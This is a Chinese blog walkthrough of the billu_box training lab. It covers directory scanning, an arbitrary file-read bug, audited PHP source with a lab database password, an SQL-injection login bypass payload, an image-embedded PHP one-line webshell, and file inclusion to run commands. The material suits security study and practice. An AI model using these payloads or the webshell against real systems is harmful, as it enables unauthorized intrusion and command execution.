首页 > 其他分享 >靶机 billu_box-任意文件读取-图片马

靶机 billu_box-任意文件读取-图片马

时间:2024-09-29 09:33:47浏览次数:9  
标签:box 200 09 POST 45 uname 靶机 php billu

爆破

80下网页让我们sql,但是怎么试都不行

dirsearch爆破下出来部分网页

[09:45:31] 200 -  307B  - /add.php   存在文件上传
[09:45:36] 200 -    1B  - /c       无                      
[09:45:41] 200 -    3KB - /head.php   一张图                                     
[09:45:42] 200 -  499B  - /images/
[09:45:42] 200 -   47KB - /in      phpinfo页面                                      
[09:45:46] 302 -    2KB - /panel.php  ->  index.php                         
[09:45:47] 200 -    8KB - /phpmy/      phpmyadmin界面                                 
[09:45:50] 200 -    1B  - /show      无                                  
[09:45:53] 200 -   72B  - /test.php    让我对file参数传值      

那就敏锐点get发个/etc/passwd,没反应。那就post传值试试,发现自动下载一个passwd文件。那就是存在任意文件读取的问题了。直接将之前扫出来的目录全拿来看看(只拿有用的)

审计

index.php

if(isset($_POST['login']))
{
    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps']));
    $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {

        $row = mysqli_fetch_assoc($result);
        echo "You are allowed<br>";
        $_SESSION['logged']=true;
        $_SESSION['admin']=$row['username'];

        header('Location: panel.php', true, 302);

    }
    else
    {
        echo "<script>alert('Try again');</script>";
    }

}

panel.php

if(isset($_POST['continue']))
{
	$dir=getcwd();
	$choice=str_replace('./','',$_POST['load']);
	
	if($choice==='add')
	{
       		include($dir.'/'.$choice.'.php');
			die();
	}
	
        if($choice==='show')
	{
        
		include($dir.'/'.$choice.'.php');
		die();
	}
	else
	{
		include($dir.'/'.$_POST['load']);//存在任意文件包含的漏洞
	}
	
}

c.php

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");//此处有mysql的账号密码

// Check connection
if (mysqli_connect_errno())
{
    echo "connection failed ->  " . mysqli_connect_error();
}

?>

登录

登录界面有两种方式进入

一种是直接拿c.php的账密来登录数据库后台,然后会发现登录用的账号密码是用明文方式存储的

另外一种是通过代码审计index.php中的代码来执行sql注入

 $uname=str_replace('\'','',urldecode($_POST['un']));
 $pass=str_replace('\'','',urldecode($_POST['ps']));
 $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';

构造payload

un='or 1=1 -- \&ps=\

此时语句将变成

select * from auth where pass='\' and uname='or 1=1 -- \'

进入后台后导航到panel.php,那就能用到他的文件包含的代码,看见存在文件上传的地方,这时候需要知道文件上传的路径。

有两种方法

一是gobuster来爆

gobuster dir -u http://192.168.1.108 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 

二是审计index.php的代码可以发现上传的代码会被移动到/uploaded_images文件下

文件包含

发现很玄学的一件事情,首先我是上传本地一个文件头GIF89a的一句话马,但是没有反应。然后我尝试wget几个图片在后面加一句话马依旧不行。但是到最后却是在jack.jpg成功了。原因不详。

<?php system($_GET['red']); ?>

构造payload

抓包panel.php页面,将load改为/uploaded_images,代码执行在get中的red参数里添加,比如

/panel.php?red=phpinfo()

反弹shell

反弹shell命令在线生成器|

标签:box,200,09,POST,45,uname,靶机,php,billu
From: https://www.cnblogs.com/ethereal258/p/18438916

相关文章

  • VulnHub-SickOs1.1靶机笔记
    SickOs1.1靶机笔记概述Vulnhub的靶机sickos1.1主要练习从互联网上搜索信息的能力,还考察了对代理使用,目录爆破的能力,很不错的靶机靶机地址:链接:https://pan.baidu.com/s/1JOTvKbfT-IpcgypcxaCEyQ?pwd=ytad提取码:ytad一、nmap扫描1)主机发现sudonmap-sn192.168.111.0/......
  • vulnhub-Basic Pentesting 2靶机
    vulnhub:https://www.vulnhub.com/entry/basic-pentesting-2,241/导入靶机(建议VirtualBox,VMWare扫不到),放在kali同网段,扫描靶机在192.168.81.3,扫描端口很多端口,存在网站服务,访问啥也没有查看8080端口是Tomcat的页面,也没啥东西尝试从ssh服务突破,枚举用户enum4li......
  • MapBox Android版开发 6 关于Logo
    MapBoxAndroid版开发6关于LogoLogo的显示查看源码及思路(Logo)第一步第二步隐藏Logo示例查看源码及思路(Info)第一步第二步隐藏Logo和Info示例看到有网友留言问如何移除Logo,今天看了下V9源码,发现MapBox提供了禁用Logo的功能。先简单说下思路部分源码,最后是示例。L......
  • mapbox没有token/token失效,地图闪烁后变空白,报错Error: A valid Mapbox access token
    目录mapbox没有token/token失效,地图闪烁后空白,报错Error:AvalidMapboxaccesstokenisrequiredtouseMapboxGLJS.一、问题描述二、mapbox去除token验证1、找到mapbox-gl文件夹2、找到mapbox-gl.js文件3、找到对应位置并修改 4、清除缓存5、问题解决三、高阶......
  • VulnStack-红日靶机二
    红日靶机二环境搭建只需要把虚拟机的host-only(仅主机)网卡改为10.10.10.0网段,如下配置把NAT网卡,改为192.168.96.0网段,如下首先恢复到v1.3快照让后点击放弃,放弃后再开机,用其他用户.\de1ay:1qaz@WSX凭证登陆,密码过期修改密码就登陆成功了完成后开启WEB服务器中......
  • Vulnhub靶机:Depth: 1
    0x01项目地址Depth:10x02靶机描述Manytimeswhileconductingapentest,Ineedtoscriptsomethinguptomakemylifeeasierortoquicklytestanattackideaorvector.RecentlyIcameacrossaninterestingcommandinjectionvectoronawebapplicatio......
  • Vulnhub靶机:The Ether: EvilScience
    0x01项目地址TheEther:EvilScience(v1.0.1)0x02靶机描述ThegoalistofindoutwhatTheEtherisupto.Youwillberequiredtobreakintotheirserver,rootthemachine,andretrievetheflag.目标是找出TheEther的意图。你需要侵入他们的服务器,获取ro......
  • 【运维监控】Prometheus+grafana+blackbox_exporter+alertmanager监控业务接口异常预
    运维监控系列文章入口:【运维监控】系列文章汇总索引文章目录一、prometheus部署二、grafana部署三、blackbox_exporter部署1、下载2、解压3、启动4、验证四、prometheus集成blackbox_exporter1、添加prometheus监控规则2、添加prometheus的预警规则3、添加prometheus......
  • CS34 HomeAgent: A Sandbox for Simulating Smart
    Projectnumber:CS34ProjectSource:SchoolofComputerScienceProjectTitle:HomeAgent:ASandboxforSimulatingSmartHomeInteractionandAutomationUsingLargeLanguageModelsProjectDescriptionandScope:ThisprojectinvolvesupgradingtheHomeAgen......
  • TVbox下载、安装使用、最新源合集分享!【全网最全】
    TVbox影视源接口的导入方法(网络导入)打开TVbox首页之后,点击设置点击配置地址,在弹出的配置窗口里面,填写影视源接口地址,确定即可。配置完成,返回首页,等待爬虫加载完毕,这个时候,你可以使用搜索功能进行影片的搜索,还可以再次点击“设置”,切换首页的数据源。在配置地址的弹窗......